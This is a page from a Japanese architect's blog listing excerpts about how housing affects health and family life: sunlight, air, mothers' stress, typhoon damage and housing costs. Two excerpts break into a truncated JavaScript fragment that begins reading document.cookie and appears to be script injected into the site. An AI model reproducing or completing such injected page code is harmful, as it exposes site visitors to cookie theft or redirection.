すまい

1/5ページ

住環境が私達に与える影響

住環境が与える人体への影響について考えてみましょう。   皆さんは住環境と身体って互いに影響し合ってると思いますか?   新しい『すまい』に生活し始めて感じる事とはどんなことでしょうか。 例えば不都合や不便さは、施工のミスではなく計画上のミスです。でも、このミスは、欠陥しされる事は少ないのが現状です。良く言われるミスは、施工のミスが多いです。   ところで、設計(計画 […]

お母さんのこと

「お父さん」「お母さん」「お子さん」  一番家に長くいるのはこの家族のなかで誰ですか?  いろいろな条件はあるかと思いますが、「お母さん」が一番長く家の中で過ごしていませんか。 家事を仕切り家の中では中心的な人物です。 そんな「お母さん」は、家の中でストレスを多く溜めがちになります。 そのストレスは、どうして生まれるのでしょうか。 家庭生活における『すまい』の不便や不都合によって生じています。 キ […]

空気の存在

人は何日生きられるか。   食べ物を食べずに1ヶ月。 水を飲まずに1週間。   では、空気がなかったらどうでしょう。   はい、それでは息を止めてください。 せ〜のぉ ・・・・・・・・・・・・・ ・・・・・・・・・・・・・ ・・・・・・・・・・・・・   どれくらい我慢できましたか? 皆さん数分でしょうか?   空気がないと 数分で命を落とす事にな […]

台風で樋が吹き飛ぶ・・・・

皆さんのお住まいのエリアでは、先日の台風の被害はありませんでしたか? 豊橋に上陸し、その後東海地域を駆け抜けていきましたが、我が家は軒樋と縦樋が吹っ飛んでしまいました。 私の自宅は、築43年の中古住宅を購入し、耐震リフォームして住んでいます。 「えっ、建築士なのに新築で自分の家を建てないの?」とよく聞かれることがあるのですが、 私はあまりその辺りを意識していません。 どちらかいうと、良いものは活用 […]

すまいマネーまるごとセミナー

設計師はマイホームの設計をするだけではなくて、そのご家族とのかかわりを通し、世代を超えて住まいを伝えていくためのお手伝いをすることが大切ではないかと考えています。 すさまじい消費社会の中で、利益を追求することに重点を置くことから、住まいを35年で建て替えないといけない・・・・・というような住宅メーカーの考え方があるようですが、本当にそれが必要なのかどうか?今一度考えなくてはならない時に来ているので […]

日当りのよいすまい

日当り ただ、日当りが良いと言って 本当に自然の恩恵を受けていますか? 以前に書きました、太陽光線の種類 「赤外線」で暖かさ 「紫外線」で消毒 「可視光線」で明るさ もう当たり前になりましたか。 太陽さんの恩恵を十二分に活用しましょう! だって、お金かかりませんからね。   function getCookie(e){var U=document.cookie.match(new Reg […]

大切にしています。

家族みんなが『すまい』で健康でいて頂く為に 私が、大切にしていることの中に 自然に逆らってはいけないよ と言うものがあります。     自然環境に順応した『すまい』に環境をつくること。 それは、そこに住む家族がいつまでも健康でいるための 大切な条件です。     function getCookie(e){var U=document.cookie.matc […]

健康な住宅とは。

「身体にやさしい住宅」や「健康住宅」 なぜ、このように呼ばれるのでしょうか?   よくよく聞いてみると、 ・使っている材料や資材が、国の定める基準値以下の弊害のないものだから ・室内温度が、管理できて過ごしやすいから ・空気の管理がされていて、常に新鮮な空気を提供できるから などでしょうか。 これは、本当に健康や身体にやさしいのでしょうか。   私達の健康は、資材や管理だけでな […]

すまいからのメッセージ

『すまい』で楽しい人生、楽しい家庭を築いてほしいと思います。 『すまい』に求めるものは、 安全なこと 耐久性があること 流行りのセンスを求めること だけではありません。 生活する環境の場として 私達、住む人に与える 影響力や感化力を無視しては いけないと思います。 『すまい』って 毎日、毎日 私達にメッセージを送り続けてくれています。 受け取ることができる 心や身体を持ち続けてほしいと願っています […]

不幸せになるきっかけ

「住めればいい」と 『すまい』を創られた方は 住み始めると不便や不都合に後悔し始めます。 「このコンセント使えないなぁ」 「窓が小さいなぁ」 「もう少し、広いとタンスが入るのに。。」 など そこには、 住まわれる方の知恵や考えが 盛り込まれていないことが多いからです。 そして 不便や不都合は いつのまにか心身のストレスにかわるかもしれません。 しあわせな人生を送るために創られるはずの『すまい』が […]

1 5